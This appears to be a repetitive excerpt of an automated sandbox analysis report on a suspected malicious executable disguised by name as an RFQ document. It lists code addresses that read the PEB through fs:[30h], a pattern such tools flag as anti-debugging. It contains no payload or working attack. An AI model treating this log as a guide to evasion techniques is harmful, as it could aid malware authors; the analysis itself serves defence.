Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016101F1 mov eax, dword ptr fs:[00000030h]	2_2_016101F1
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016101F1 mov eax, dword ptr fs:[00000030h]	2_2_016101F1
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016101F1 mov eax, dword ptr fs:[00000030h]	2_2_016101F1
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0162F1F0 mov eax, dword ptr fs:[00000030h]	2_2_0162F1F0
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0162F1F0 mov eax, dword ptr fs:[00000030h]	2_2_0162F1F0
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016101C0 mov eax, dword ptr fs:[00000030h]	2_2_016101C0
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016101C0 mov eax, dword ptr fs:[00000030h]	2_2_016101C0
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016151C0 mov eax, dword ptr fs:[00000030h]	2_2_016151C0
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016151C0 mov eax, dword ptr fs:[00000030h]	2_2_016151C0
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016151C0 mov eax, dword ptr fs:[00000030h]	2_2_016151C0
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016151C0 mov eax, dword ptr fs:[00000030h]	2_2_016151C0
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_015F91F0 mov eax, dword ptr fs:[00000030h]	2_2_015F91F0
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_015F91F0 mov eax, dword ptr fs:[00000030h]	2_2_015F91F0
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_015F81EB mov eax, dword ptr fs:[00000030h]	2_2_015F81EB
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0163E1A4 mov eax, dword ptr fs:[00000030h]	2_2_0163E1A4
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0163E1A4 mov eax, dword ptr fs:[00000030h]	2_2_0163E1A4
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016341BB mov ecx, dword ptr fs:[00000030h]	2_2_016341BB
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016341BB mov eax, dword ptr fs:[00000030h]	2_2_016341BB
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016341BB mov eax, dword ptr fs:[00000030h]	2_2_016341BB
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016D51B6 mov eax, dword ptr fs:[00000030h]	2_2_016D51B6
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016331BE mov eax, dword ptr fs:[00000030h]	2_2_016331BE
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016331BE mov eax, dword ptr fs:[00000030h]	2_2_016331BE
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_01604180 mov eax, dword ptr fs:[00000030h]	2_2_01604180
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_01604180 mov eax, dword ptr fs:[00000030h]	2_2_01604180
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_01604180 mov eax, dword ptr fs:[00000030h]	2_2_01604180
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_01641190 mov eax, dword ptr fs:[00000030h]	2_2_01641190
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_01641190 mov eax, dword ptr fs:[00000030h]	2_2_01641190
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_01629194 mov eax, dword ptr fs:[00000030h]	2_2_01629194
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016A9060 mov eax, dword ptr fs:[00000030h]	2_2_016A9060
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_01607072 mov eax, dword ptr fs:[00000030h]	2_2_01607072
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_01606074 mov eax, dword ptr fs:[00000030h]	2_2_01606074
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_01606074 mov eax, dword ptr fs:[00000030h]	2_2_01606074
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_01630044 mov eax, dword ptr fs:[00000030h]	2_2_01630044
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_01601051 mov eax, dword ptr fs:[00000030h]	2_2_01601051
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_01601051 mov eax, dword ptr fs:[00000030h]	2_2_01601051
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016D505B mov eax, dword ptr fs:[00000030h]	2_2_016D505B
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_01625004 mov eax, dword ptr fs:[00000030h]	2_2_01625004
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_01625004 mov ecx, dword ptr fs:[00000030h]	2_2_01625004
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_01608009 mov eax, dword ptr fs:[00000030h]	2_2_01608009
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_015FD02D mov eax, dword ptr fs:[00000030h]	2_2_015FD02D
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_01642010 mov ecx, dword ptr fs:[00000030h]	2_2_01642010
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_015FB0D6 mov eax, dword ptr fs:[00000030h]	2_2_015FB0D6
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_015FB0D6 mov eax, dword ptr fs:[00000030h]	2_2_015FB0D6
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_015FB0D6 mov eax, dword ptr fs:[00000030h]	2_2_015FB0D6
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_015FB0D6 mov eax, dword ptr fs:[00000030h]	2_2_015FB0D6
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0163D0F0 mov eax, dword ptr fs:[00000030h]	2_2_0163D0F0
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0163D0F0 mov ecx, dword ptr fs:[00000030h]	2_2_0163D0F0
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_015F90F8 mov eax, dword ptr fs:[00000030h]	2_2_015F90F8
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_015F90F8 mov eax, dword ptr fs:[00000030h]	2_2_015F90F8
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_015F90F8 mov eax, dword ptr fs:[00000030h]	2_2_015F90F8
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_015F90F8 mov eax, dword ptr fs:[00000030h]	2_2_015F90F8
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_015FC0F6 mov eax, dword ptr fs:[00000030h]	2_2_015FC0F6
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0161B0D0 mov eax, dword ptr fs:[00000030h]	2_2_0161B0D0
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016400A5 mov eax, dword ptr fs:[00000030h]	2_2_016400A5
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016BB0AF mov eax, dword ptr fs:[00000030h]	2_2_016BB0AF
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_015FA093 mov ecx, dword ptr fs:[00000030h]	2_2_015FA093
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016AF0A5 mov eax, dword ptr fs:[00000030h]	2_2_016AF0A5
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016AF0A5 mov eax, dword ptr fs:[00000030h]	2_2_016AF0A5
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016AF0A5 mov eax, dword ptr fs:[00000030h]	2_2_016AF0A5
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016AF0A5 mov eax, dword ptr fs:[00000030h]	2_2_016AF0A5
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016AF0A5 mov eax, dword ptr fs:[00000030h]	2_2_016AF0A5
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016AF0A5 mov eax, dword ptr fs:[00000030h]	2_2_016AF0A5
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016AF0A5 mov eax, dword ptr fs:[00000030h]	2_2_016AF0A5
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_015FC090 mov eax, dword ptr fs:[00000030h]	2_2_015FC090
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016D50B7 mov eax, dword ptr fs:[00000030h]	2_2_016D50B7
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016D4080 mov eax, dword ptr fs:[00000030h]	2_2_016D4080
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016D4080 mov eax, dword ptr fs:[00000030h]	2_2_016D4080
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016D4080 mov eax, dword ptr fs:[00000030h]	2_2_016D4080
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016D4080 mov eax, dword ptr fs:[00000030h]	2_2_016D4080
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016D4080 mov eax, dword ptr fs:[00000030h]	2_2_016D4080
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016D4080 mov eax, dword ptr fs:[00000030h]	2_2_016D4080
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016D4080 mov eax, dword ptr fs:[00000030h]	2_2_016D4080
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0160B360 mov eax, dword ptr fs:[00000030h]	2_2_0160B360
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0160B360 mov eax, dword ptr fs:[00000030h]	2_2_0160B360
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0160B360 mov eax, dword ptr fs:[00000030h]	2_2_0160B360
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0160B360 mov eax, dword ptr fs:[00000030h]	2_2_0160B360
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0160B360 mov eax, dword ptr fs:[00000030h]	2_2_0160B360
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0160B360 mov eax, dword ptr fs:[00000030h]	2_2_0160B360
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0163E363 mov eax, dword ptr fs:[00000030h]	2_2_0163E363
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0163E363 mov eax, dword ptr fs:[00000030h]	2_2_0163E363
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0163E363 mov eax, dword ptr fs:[00000030h]	2_2_0163E363
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0163E363 mov eax, dword ptr fs:[00000030h]	2_2_0163E363
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0163E363 mov eax, dword ptr fs:[00000030h]	2_2_0163E363
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0163E363 mov eax, dword ptr fs:[00000030h]	2_2_0163E363
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0163E363 mov eax, dword ptr fs:[00000030h]	2_2_0163E363
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0163E363 mov eax, dword ptr fs:[00000030h]	2_2_0163E363
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0167E372 mov eax, dword ptr fs:[00000030h]	2_2_0167E372
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0167E372 mov eax, dword ptr fs:[00000030h]	2_2_0167E372
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0167E372 mov eax, dword ptr fs:[00000030h]	2_2_0167E372
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0167E372 mov eax, dword ptr fs:[00000030h]	2_2_0167E372
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0162237A mov eax, dword ptr fs:[00000030h]	2_2_0162237A
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_015F8347 mov eax, dword ptr fs:[00000030h]	2_2_015F8347
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_015F8347 mov eax, dword ptr fs:[00000030h]	2_2_015F8347
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_015F8347 mov eax, dword ptr fs:[00000030h]	2_2_015F8347
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_01680371 mov eax, dword ptr fs:[00000030h]	2_2_01680371
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_01680371 mov eax, dword ptr fs:[00000030h]	2_2_01680371
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0163A350 mov eax, dword ptr fs:[00000030h]	2_2_0163A350
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_01638322 mov eax, dword ptr fs:[00000030h]	2_2_01638322
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_01638322 mov eax, dword ptr fs:[00000030h]	2_2_01638322
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_01638322 mov eax, dword ptr fs:[00000030h]	2_2_01638322
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0162332D mov eax, dword ptr fs:[00000030h]	2_2_0162332D
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016D3336 mov eax, dword ptr fs:[00000030h]	2_2_016D3336
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_015F9303 mov eax, dword ptr fs:[00000030h]	2_2_015F9303
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_015F9303 mov eax, dword ptr fs:[00000030h]	2_2_015F9303
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016BF30A mov eax, dword ptr fs:[00000030h]	2_2_016BF30A
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0168330C mov eax, dword ptr fs:[00000030h]	2_2_0168330C
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0168330C mov eax, dword ptr fs:[00000030h]	2_2_0168330C
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0168330C mov eax, dword ptr fs:[00000030h]	2_2_0168330C
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0168330C mov eax, dword ptr fs:[00000030h]	2_2_0168330C
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0161E310 mov eax, dword ptr fs:[00000030h]	2_2_0161E310
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0161E310 mov eax, dword ptr fs:[00000030h]	2_2_0161E310
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0161E310 mov eax, dword ptr fs:[00000030h]	2_2_0161E310
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_015FE328 mov eax, dword ptr fs:[00000030h]	2_2_015FE328
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_015FE328 mov eax, dword ptr fs:[00000030h]	2_2_015FE328
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_015FE328 mov eax, dword ptr fs:[00000030h]	2_2_015FE328
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0163631F mov eax, dword ptr fs:[00000030h]	2_2_0163631F
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_015FC3C7 mov eax, dword ptr fs:[00000030h]	2_2_015FC3C7
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_015FE3C0 mov eax, dword ptr fs:[00000030h]	2_2_015FE3C0
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_015FE3C0 mov eax, dword ptr fs:[00000030h]	2_2_015FE3C0
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_015FE3C0 mov eax, dword ptr fs:[00000030h]	2_2_015FE3C0
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016063CB mov eax, dword ptr fs:[00000030h]	2_2_016063CB
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016333D0 mov eax, dword ptr fs:[00000030h]	2_2_016333D0
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016343D0 mov ecx, dword ptr fs:[00000030h]	2_2_016343D0
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016843D5 mov eax, dword ptr fs:[00000030h]	2_2_016843D5
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016093A6 mov eax, dword ptr fs:[00000030h]	2_2_016093A6
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016093A6 mov eax, dword ptr fs:[00000030h]	2_2_016093A6
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0167C3B0 mov eax, dword ptr fs:[00000030h]	2_2_0167C3B0
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_01601380 mov eax, dword ptr fs:[00000030h]	2_2_01601380
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_01601380 mov eax, dword ptr fs:[00000030h]	2_2_01601380
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_01601380 mov eax, dword ptr fs:[00000030h]	2_2_01601380
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_01601380 mov eax, dword ptr fs:[00000030h]	2_2_01601380
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_01601380 mov eax, dword ptr fs:[00000030h]	2_2_01601380
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0161F380 mov eax, dword ptr fs:[00000030h]	2_2_0161F380
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0161F380 mov eax, dword ptr fs:[00000030h]	2_2_0161F380
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0161F380 mov eax, dword ptr fs:[00000030h]	2_2_0161F380
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0161F380 mov eax, dword ptr fs:[00000030h]	2_2_0161F380
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0161F380 mov eax, dword ptr fs:[00000030h]	2_2_0161F380
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0161F380 mov eax, dword ptr fs:[00000030h]	2_2_0161F380
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016BF38A mov eax, dword ptr fs:[00000030h]	2_2_016BF38A
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0162A390 mov eax, dword ptr fs:[00000030h]	2_2_0162A390
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0162A390 mov eax, dword ptr fs:[00000030h]	2_2_0162A390
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0162A390 mov eax, dword ptr fs:[00000030h]	2_2_0162A390
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0169327E mov eax, dword ptr fs:[00000030h]	2_2_0169327E
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0169327E mov eax, dword ptr fs:[00000030h]	2_2_0169327E
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0169327E mov eax, dword ptr fs:[00000030h]	2_2_0169327E
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0169327E mov eax, dword ptr fs:[00000030h]	2_2_0169327E
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0169327E mov eax, dword ptr fs:[00000030h]	2_2_0169327E
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0169327E mov eax, dword ptr fs:[00000030h]	2_2_0169327E
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016BD270 mov eax, dword ptr fs:[00000030h]	2_2_016BD270
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016C124C mov eax, dword ptr fs:[00000030h]	2_2_016C124C
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016C124C mov eax, dword ptr fs:[00000030h]	2_2_016C124C
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016C124C mov eax, dword ptr fs:[00000030h]	2_2_016C124C
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016C124C mov eax, dword ptr fs:[00000030h]	2_2_016C124C
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0162F24A mov eax, dword ptr fs:[00000030h]	2_2_0162F24A
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016BF247 mov eax, dword ptr fs:[00000030h]	2_2_016BF247
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_015FB273 mov eax, dword ptr fs:[00000030h]	2_2_015FB273
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_015FB273 mov eax, dword ptr fs:[00000030h]	2_2_015FB273
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_015FB273 mov eax, dword ptr fs:[00000030h]	2_2_015FB273
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0167D250 mov eax, dword ptr fs:[00000030h]	2_2_0167D250
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0167D250 mov ecx, dword ptr fs:[00000030h]	2_2_0167D250
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_015F821B mov eax, dword ptr fs:[00000030h]	2_2_015F821B
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0163A22B mov eax, dword ptr fs:[00000030h]	2_2_0163A22B
